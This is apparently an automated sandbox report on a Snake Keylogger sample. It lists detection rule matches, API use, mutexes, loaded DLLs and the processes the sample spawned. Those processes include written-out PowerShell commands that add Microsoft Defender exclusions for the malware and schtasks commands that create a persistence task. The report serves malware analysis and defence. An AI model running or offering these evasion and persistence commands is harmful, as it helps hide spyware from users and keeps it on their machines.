Source: WIpGif4IRrFfamQ.exe, 00000000.00000000.2005320237.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2066859102.000000000A250000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.00000000048CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.0000000003338000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2059553985.000000000117E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2064715859.0000000007381000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4468952080.0000000000F37000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs WIpGif4IRrFfamQ.exe
Source: WIpGif4IRrFfamQ.exe	Binary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe

Source: WIpGif4IRrFfamQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: WIpGif4IRrFfamQ.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AcEnrS.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.SetAccessControl
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.AddAccessRule
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.SetAccessControl
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.AddAccessRule
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.SetAccessControl
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/19@4/4

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File created: C:\Users\user\AppData\Roaming\AcEnrS.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Mutant created: \Sessions\1\BaseNamedObjects\dNwYxCASxh
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7708
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5423.tmp

Jump to behavior

Source: WIpGif4IRrFfamQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WIpGif4IRrFfamQ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.00000000030C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WIpGif4IRrFfamQ.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File read: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AcEnrS.exe C:\Users\user\AppData\Roaming\AcEnrS.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
